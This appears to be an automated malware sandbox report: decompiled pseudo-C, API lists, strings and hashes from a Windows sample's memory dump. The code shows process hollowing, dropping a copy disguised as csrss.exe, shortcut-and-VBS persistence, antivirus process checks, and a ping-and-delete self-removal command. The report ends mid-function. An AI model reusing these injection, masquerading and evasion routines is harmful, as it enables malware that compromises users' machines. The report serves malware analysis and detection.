										E013C1970( &_v2588, L"objFile.Close\r\n");
										_t128 = E013C7AF0( &_v1044,  &_v2588);
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E013C6A40(0, __eflags,  &_v1044);
											Sleep(0xbb8);
											DeleteFileW( &_v1044);
											_t134 = E013C7ED0( &_v3612);
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x013c65e5
0x013c65f6
0x013c6607
0x013c661f
0x013c662e
0x013c663f
0x013c6652
0x013c6657
0x013c665c
0x013c6670
0x013c6681
0x013c6692
0x013c669e
0x013c66a3
0x013c66a6
0x013c66a8
0x00000000
0x013c66aa
0x013c66b0
0x013c66bb
0x013c66be
0x013c66c0
0x013c6800
0x013c6807
0x013c680c
0x013c680f
0x013c6811
0x00000000
0x013c6813
0x013c681f
0x013c6832
0x013c6843
0x013c6856
0x013c685b
0x013c685e
0x013c6860
0x00000000
0x00000000
0x00000000
0x00000000
0x013c6860
0x013c66c6
0x013c66cb
0x013c66d0
0x013c66d3
0x013c66d5
0x00000000
0x013c66db
0x013c66e0
0x013c66e5
0x013c66e8
0x013c66ea
0x00000000
0x013c66f0
0x013c66f7
0x013c66fc
0x013c66ff
0x013c6701
0x013c6869
0x013c6870
0x013c6883
0x013c6894
0x013c68a3
0x013c68b3
0x013c68c0
0x013c68cf
0x013c68da
0x013c6707
0x013c6713
0x013c6724
0x013c6737
0x013c6748
0x013c6759
0x013c676a
0x013c677d
0x013c678e
0x013c67a2
0x013c67b5
0x013c67ba
0x013c67bd
0x013c67bf
0x013c6862
0x013c6862
0x013c6868
0x013c67c5
0x013c67cc
0x013c67d9
0x013c67e6
0x013c67ef
0x013c67f4
0x013c67f7
0x013c67f9
0x00000000
0x013c67fb
0x013c67ff
0x013c67ff
0x013c67f9
0x013c67bf
0x013c6701
0x013c66ea
0x013c66d5
0x013c66c0
0x013c665e
0x013c665e
0x013c6663
0x013c6663

APIs

Part of subcall function 013C7FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C7FAA
Part of subcall function 013C7FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C7FBC
Part of subcall function 013C7FA0: CoTaskMemFree.OLE32(00000000,013CAAE0), ref: 013C7FEF
Part of subcall function 013C7FA0: FreeLibrary.KERNEL32(00000000,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C7FF6

Sleep.KERNEL32(00000BB8), ref: 013C67D9
DeleteFileW.KERNEL32(?), ref: 013C67E6

Strings

objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///, xrefs: 013C6764
Set objFile = objFSO.CreateTextFile(outFile,True), xrefs: 013C6753
.exe""", xrefs: 013C6788
a2start.exe, xrefs: 013C66DB
viTRMUuKeV, xrefs: 013C667B
outFile=", xrefs: 013C671E
C:\ProgramData\LKBNMTFJgl, xrefs: 013C65DF, 013C661A
objFile.Close, xrefs: 013C679C
Set objFSO=CreateObject("Scripting.FileSystemObject"), xrefs: 013C670D
a2guard.exe, xrefs: 013C66AB
csrss.exe, xrefs: 013C6601
[InternetShortcut]URL="file:///, xrefs: 013C6819
", xrefs: 013C6742
.url, xrefs: 013C668C
.exe", xrefs: 013C683D
\r.vbs, xrefs: 013C6639
.exe, xrefs: 013C688E
a2service.exe, xrefs: 013C66C6

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
API String ID: 976351581-227138989
Opcode ID: 7b5bb2d33c9fb0dc244b608d4b419e745351c4a9c93e79501bc40a3fea36a160
Instruction ID: 40e1d321bbe5c1932cd2fa46c432bc6d2c9f4b186b4a4b90b5f430b633150977
Opcode Fuzzy Hash: 7b5bb2d33c9fb0dc244b608d4b419e745351c4a9c93e79501bc40a3fea36a160
Instruction Fuzzy Hash: 23610DB3D4021DA6DF50E7A99C45ECB72AC5F14A48F0404AEA509E3102FA74EF959FE1

Uniqueness

Uniqueness Score: -1.00%

Function 013C76A0, Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 284
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E013C76A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v1116;
				char _v1636;
				short _v4196;
				void* _t53;
				WCHAR* _t54;
				WCHAR* _t56;
				WCHAR* _t58;
				WCHAR* _t59;
				WCHAR* _t60;
				signed int _t62;
				WCHAR* _t66;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				if( *0x1592e00 >= 0xc350) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x1591c4c;
					if( *0x1591c4c == 0) {
						goto L39;
					} else {
						E013C1BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E013C7C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E013C1A30("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E013C1B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E013C1B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E013C1B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E013C1970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E013C1A30("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E013C1A30("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", 0x159204c);
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E013C1A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E013C1970( &_v1116, "\\");
												E013C1970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E013C6D50();
												L17:
												_t66 = E013C87C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E013C1510();
													 *0x1592e00 =  &(( *0x1592e00)[0]);
													__eflags =  *0x1592e00;
													goto L39;
												} else {
													E013C1510();
													_t143 = E013C15E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E013C8B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E013C1740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E013C1510();
																_t153 = _t155 + 4;
																__eflags =  *0x1591300;
																if( *0x1591300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E013C8730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x1592118 = 1;
																	_t87 =  *0x159211c;
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x1592120;
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E013C1A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E013C1970( &_v4196, "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe");
																		E013C1970( &_v4196, L"\" & \"");
																		E013C1970( &_v4196,  &_v1116);
																		E013C1970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E013C15E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E013C7FA0(_t130, _t143, 0x13caad0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E013C1970(_t143, "\\");
																			E013C1970(_t143, "viTRMUuKeV");
																			E013C1970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E013C6D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E013C1510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E013C1510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x1592e00 =  &(( *0x1592e00)[0]);
													E013C1A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E013C1970( &_v1636, "\\");
													E013C1970( &_v1636, "csrss.exe");
													E013C6340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x1592e00 =  &(( *0x1592e00)[0]);
							return _t53;
						}
					}
				}
			}

0x013c76a0
0x013c76a8
0x013c76b5
0x013c7a92
0x013c7a92
0x013c7a97
0x013c76bb
0x013c76bb
0x013c76c3
0x00000000
0x013c76c9
0x013c76d2
0x013c76da
0x013c76e1
0x013c76e5
0x013c76ea
0x013c76ec
0x013c76f1
0x013c7700
0x013c7715
0x013c7717
0x013c7719
0x013c7a7e
0x013c7a7e
0x00000000
0x013c771f
0x013c771f
0x013c7724
0x00000000
0x013c772a
0x013c7734
0x013c7739
0x013c773c
0x013c773e
0x013c77ac
0x013c77b8
0x013c77be
0x013c77c0
0x00000000
0x013c77c6
0x013c77c6
0x013c77cb
0x00000000
0x013c77d1
0x013c77d6
0x013c77de
0x013c77e0
0x013c77e2
0x00000000
0x013c77e8
0x013c77e8
0x013c77ed
0x00000000
0x013c77f3
0x013c77fa
0x013c77ff
0x013c7802
0x013c780b
0x013c781e
0x013c782d
0x013c7832
0x013c7835
0x013c7835
0x013c7837
0x013c7837
0x013c784b
0x013c7850
0x00000000
0x013c7850
0x013c77ed
0x013c77e2
0x013c77cb
0x013c7740
0x013c774a
0x013c774f
0x013c7752
0x013c7754
0x00000000
0x013c7756
0x013c7760
0x013c7765
0x013c7768
0x013c776a
0x00000000
0x013c776c
0x013c7778
0x013c7789
0x013c779a
0x013c779f
0x013c77a2
0x013c7853
0x013c785e
0x013c7863
0x013c7866
0x013c7869
0x013c786b
0x013c7a81
0x013c7a81
0x013c7a89
0x013c7a89
0x00000000
0x013c7871
0x013c7871
0x013c7883
0x013c7885
0x013c7888
0x013c788a
0x013c7894
0x013c7899
0x013c789c
0x013c789e
0x013c7906
0x013c790b
0x013c7910
0x013c7913
0x013c7914
0x013c7916
0x00000000
0x013c7918
0x013c7918
0x013c791d
0x013c7920
0x013c7927
0x013c7995
0x013c7995
0x013c7999
0x013c799e
0x013c79a3
0x013c79a3
0x013c79ad
0x013c79af
0x013c79b4
0x013c79b6
0x013c79cc
0x013c79cc
0x013c79d1
0x013c79d3
0x013c79d8
0x013c79d8
0x013c79ea
0x013c79fb
0x013c7a0c
0x013c7a1f
0x013c7a30
0x013c7a35
0x013c7a58
0x013c7a5e
0x013c7a60
0x013c7a6f
0x013c7a74
0x013c7a78
0x013c7a78
0x013c79b8
0x013c79be
0x013c79c4
0x013c79c6
0x00000000
0x00000000
0x013c79c6
0x013c7929
0x013c7933
0x013c7935
0x013c7938
0x013c793a
0x013c7948
0x013c794d
0x013c7950
0x013c7952
0x00000000
0x013c7958
0x013c795e
0x013c7969
0x013c7974
0x013c7979
0x013c797c
0x013c7982
0x013c7984
0x013c7985
0x013c7987
0x00000000
0x013c798d
0x013c798d
0x013c7992
0x00000000
0x013c7992
0x013c7987
0x013c7952
0x013c793a
0x013c7927
0x013c78a0
0x013c78a0
0x013c78a0
0x013c78a1
0x013c78a1
0x013c78a6
0x013c78a6
0x013c789e
0x013c78b0
0x013c78b2
0x013c78c5
0x013c78d6
0x013c78e7
0x013c78f3
0x013c78fb
0x013c7902
0x013c7902
0x013c786b
0x013c776a
0x013c7754
0x013c773e
0x013c7724
0x013c76f3
0x013c76f3
0x013c76fe
0x013c76fe
0x013c76f1
0x013c76c3

APIs

Part of subcall function 013C7C30: InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 013C7C87

GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe,C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe,00000200,?,?,?,?,?,?), ref: 013C7715
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 013C78B0

Strings

cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q ", xrefs: 013C79E4
viTRMUuKeV, xrefs: 013C7963
\, xrefs: 013C7802
C:\ProgramData\LKBNMTFJgl, xrefs: 013C772A, 013C7772, 013C78BF
ProgramData, xrefs: 013C7740
.url, xrefs: 013C796E
C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe, xrefs: 013C76BB, 013C770B, 013C7710, 013C772F, 013C7745, 013C775B, 013C79F5
csrss.exe, xrefs: 013C7794, 013C7845, 013C78E1
" & ", xrefs: 013C7A06

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CrackDeleteFileInternetLongNamePath
String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe$ProgramData$\$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV
API String ID: 3724707802-3332743789
Opcode ID: 42fd9f246ff9f5423f38504a896943310f9724fac77c4f0c28585f97f55aad85
Instruction ID: 5b460b849de66b802ee85d770db4d8a00d86983e44a96ad01014f26a9fcfe480
Opcode Fuzzy Hash: 42fd9f246ff9f5423f38504a896943310f9724fac77c4f0c28585f97f55aad85
Instruction Fuzzy Hash: 1B91FB71D4021AA6EF20A6E9DC45FDA376CAF10F4DF04006DEA04E6142FB61EE549FE6

Uniqueness

Uniqueness Score: -1.00%

Function 013C5B80, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 237
threadsleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E013C5B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				E013C1BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				_v828.ContextFlags = 0x10007;
				_t142 =  *0x13cc038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					_t62 =  *0x13cc074; // 0x383538b7
					__eflags =  *((intOrPtr*)(_t62 + 0x13cc038)) - 0x4550;
					_t6 = _t62 + 0x13cc038; // 0x3971f8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x13cc038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						E013C1670( &_v112, 0, 0x44);
						E013C1670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x1591bb8;
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x1591bb8 == 0) {
							_push(0x14);
						} else {
							_push(0x800000c);
						}
						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L27;
						} else {
							_push(_t115);
							_t72 = GetThreadContext(_v16,  &_v828);
							__eflags = _t72;
							if(_t72 == 0) {
								L26:
								TerminateProcess(_v20, 0);
								CloseHandle(_v16);
								CloseHandle(_v20);
								__eflags = 0;
								return 0;
							} else {
								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
								__eflags = _t81;
								if(_t81 == 0) {
									goto L26;
								} else {
									_t123 =  *((intOrPtr*)(_t126 + 0x34));
									_t120 = _v28;
									__eflags = _t120 - _t123;
									if(__eflags < 0) {
										L13:
										_t82 = E013C72C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
										_t132 = _t82;
										_v24 = _t132;
										__eflags = _t132;
										if(_t132 == 0) {
											goto L26;
										} else {
											asm("cdq");
											_t124 =  &_v36;
											_v44 = _t82;
											_v40 = _t123;
											_t84 = E013C74D0(_t82,  &_v36, _v20, _t82, _t123, 0x13cc038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
											__eflags = _t84;
											if(_t84 == 0) {
												goto L26;
											} else {
												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
												_t117 = 0;
												__eflags = 0 -  *(_t126 + 6);
												if(0 >=  *(_t126 + 6)) {
													L20:
													_t42 = _t126 + 0x34; // 0x3971f923
													_t90 = E013C74D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
													__eflags = _t90;
													if(_t90 == 0) {
														goto L26;
													} else {
														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
														_t94 = SetThreadContext(_v16,  &_v828);
														__eflags = _t94;
														if(_t94 == 0) {
															goto L26;
														} else {
															_t95 = E013C71A0(0, _t124, _v16);
															__eflags = _t95;
															if(_t95 == 0) {
																goto L26;
															} else {
																Sleep(0x1388);
																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
																__eflags = _t133;
																if(_t133 != 0) {
																	E013C1BB0(_t133, 0, 0x138);
																	E013C74D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
																	VirtualFree(_t133, 0, 0x8000);
																}
																CloseHandle(_v16);
																CloseHandle(_v20);
																return _v12;
															}
														}
													}
												} else {
													_t34 = _t126 + 0x2c; // 0x3971f91b
													_t136 = _t34 + _t85;
													asm("o16 nop [eax+eax]");
													while(1) {
														_t108 = E013C74D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x13cc038,  *((intOrPtr*)(_t136 - 4)), 0);
														__eflags = _t108;
														if(_t108 == 0) {
															goto L26;
														}
														_t117 = _t117 + 1;
														_t136 = _t136 + 0x28;
														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
															continue;
														} else {
															_t132 = _v24;
															goto L20;
														}
														goto L28;
													}
													goto L26;
												}
											}
										}
									} else {
										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
										if(__eflags > 0) {
											goto L13;
										} else {
											__eflags = E013C7120(_t123, _v20, _t120, 0);
											if(__eflags != 0) {
												goto L26;
											} else {
												goto L13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					E013C1CE0("0125789244697858", 0x10, 0x13cc038, 0xe7c00);
					_t138 = _t138 + 0x10;
					_t143 =  *0x13cc038 - 0x5a4d; // 0x6b7d
					if(_t143 == 0) {
						goto L3;
					} else {
						return 0;
					}
				}
				L28:
			}

0x013c5b80
0x013c5b98
0x013c5ba2
0x013c5ba9
0x013c5bac
0x013c5bb3
0x013c5bbd
0x013c5bc4
0x013c5bef
0x013c5bef
0x013c5bf4
0x013c5bff
0x013c5bff
0x013c5c05
0x013c5e53
0x013c5e54
0x013c5e5a
0x013c5c0b
0x013c5c13
0x013c5c20
0x013c5c28
0x013c5c2f
0x013c5c39
0x013c5c3d
0x013c5c3e
0x013c5c40
0x013c5c42
0x013c5c4b
0x013c5c44
0x013c5c44
0x013c5c44
0x013c5c58
0x013c5c5e
0x013c5c60
0x00000000
0x013c5c66
0x013c5c66
0x013c5c71
0x013c5c77
0x013c5c79
0x013c5e2f
0x013c5e34
0x013c5e43
0x013c5e48
0x013c5e4c
0x013c5e52
0x013c5c7f
0x013c5c96
0x013c5c9c
0x013c5c9e
0x00000000
0x013c5ca4
0x013c5ca4
0x013c5ca7
0x013c5caa
0x013c5cac
0x013c5cca
0x013c5cdc
0x013c5ce1
0x013c5ce3
0x013c5ce6
0x013c5ce8
0x00000000
0x013c5cee
0x013c5cee
0x013c5cf3
0x013c5cf6
0x013c5cfd
0x013c5d0a
0x013c5d0f
0x013c5d11
0x00000000
0x013c5d17
0x013c5d17
0x013c5d1d
0x013c5d1f
0x013c5d23
0x013c5d65
0x013c5d6b
0x013c5d7e
0x013c5d83
0x013c5d85
0x00000000
0x013c5d8b
0x013c5d90
0x013c5da0
0x013c5da6
0x013c5da8
0x00000000
0x013c5dae
0x013c5db1
0x013c5db6
0x013c5db8
0x00000000
0x013c5dba
0x013c5dbf
0x013c5dd9
0x013c5ddb
0x013c5ddd
0x013c5de7
0x013c5e02
0x013c5e0f
0x013c5e0f
0x013c5e1e
0x013c5e23
0x013c5e2e
0x013c5e2e
0x013c5db8
0x013c5da8
0x013c5d25
0x013c5d25
0x013c5d28
0x013c5d2a
0x013c5d30
0x013c5d49
0x013c5d4e
0x013c5d50
0x00000000
0x00000000
0x013c5d5a
0x013c5d5b
0x013c5d5e
0x013c5d60
0x00000000
0x013c5d62
0x013c5d62
0x00000000
0x013c5d62
0x00000000
0x013c5d60
0x00000000
0x013c5d30
0x013c5d23
0x013c5d11
0x013c5cae
0x013c5cb3
0x013c5cb5
0x00000000
0x013c5cb7
0x013c5cc2
0x013c5cc4
0x00000000
0x00000000
0x00000000
0x00000000
0x013c5cc4
0x013c5cb5
0x013c5cac
0x013c5c9e
0x013c5c79
0x013c5c60
0x013c5bc6
0x013c5bd7
0x013c5bdc
0x013c5bdf
0x013c5be6
0x00000000
0x013c5be8
0x013c5bee
0x013c5bee
0x013c5be6
0x00000000

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000014,00000000,00000000,00000044,?,?,?,?,?,?,013C49E6), ref: 013C5C58
GetThreadContext.KERNEL32(013C49E6,00010007,00000000,?,?,?,?,?,013C49E6,?,?,?), ref: 013C5C71
ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,013C49E6,?,?,?), ref: 013C5C96
SetThreadContext.KERNEL32(013C49E6,00010007,?,?,00000000,3971F923,00000004,00000000,?,00000000,?,013CC038,?,00000000,?,?), ref: 013C5DA0
Sleep.KERNEL32(00001388,013C49E6,?,013CC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 013C5DBF
VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,013CC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 013C5DD3
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,013C49E6,00000000,00000138,?,?,00003000,00000040), ref: 013C5E0F
CloseHandle.KERNEL32(013C49E6,?,013CC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 013C5E1E
CloseHandle.KERNEL32(?,?,013CC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 013C5E23

Strings

0125789244697858, xrefs: 013C5BD2
D, xrefs: 013C5C28

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
String ID: 0125789244697858$D
API String ID: 1428767187-3232960292
Opcode ID: c3ad335b874adaffc8e9f3147f84bd1d4e369757d2582a76880f2905b2d31db1
Instruction ID: c3e9ddaa30dbf13155b1bc6c5a95852dbd5023449b50945e86a3e5fa152a1f0c
Opcode Fuzzy Hash: c3ad335b874adaffc8e9f3147f84bd1d4e369757d2582a76880f2905b2d31db1
Instruction Fuzzy Hash: 8E81B471A40229AFEB209B94DC45FEEBB79FB04B08F044159FA08B6190E771BD50CF94

Uniqueness

Uniqueness Score: -1.00%

Function 013C6A40, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 180
processCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E013C6A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E013C1BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E013C1BB0( &_v740, 0, 0x288);
				E013C1670( &_v740, 0, 0x288);
				_t74 = _a4;
				E013C1A00( &_v612, _a4);
				_t38 = E013C7ED0(_a4);
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E013C8DD0() == 0) {
					L22:
					E013C1BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E013C1A00( &_v1780, L"cmd.exe /C WScript \"");
					E013C1970( &_v1780, _t74);
					E013C1970( &_v1780, "\"");
					_t48 = E013C7ED0(_t74);
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E013C7EF0("bdagent.exe");
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x1591314 == 0) {
						_push(0);
						_t48 = E013C29E0( &_v740, 0x13c0000, E013C80E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E013C6CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E013C80E0(_t68, _t74, _t76);
					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
